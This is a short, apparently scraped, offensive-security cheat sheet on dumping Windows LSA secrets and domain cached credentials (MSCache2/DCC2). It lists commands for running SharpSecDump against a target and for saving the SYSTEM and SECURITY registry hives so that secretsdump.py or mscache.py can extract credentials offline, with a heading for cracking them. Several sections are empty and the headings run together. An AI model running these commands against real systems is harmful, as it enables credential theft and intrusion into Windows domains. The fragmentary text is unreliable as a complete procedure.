LSA
Local Security Authority
SharpSecDump
Decrypt LSA secrets on target:
PS > Invoke-SharpSecDump -C "-target=127.0.0.1"LsaStorePrivateData (ksetup)
MSCash2/MSCache2 (DCC2)
Domain cached credentials are stored within LSA secrets in HKLM:\SECURITY registry hive:
Cmd > reg save hklm\system system.hive
Cmd > reg save hklm\security security.hivesecretsdump.py
Export registry hives and extract cached creds locally with secretsdump.py:
mscache.py
Export registry hives and extract cached creds locally with mscache.py:
Crack
Last updated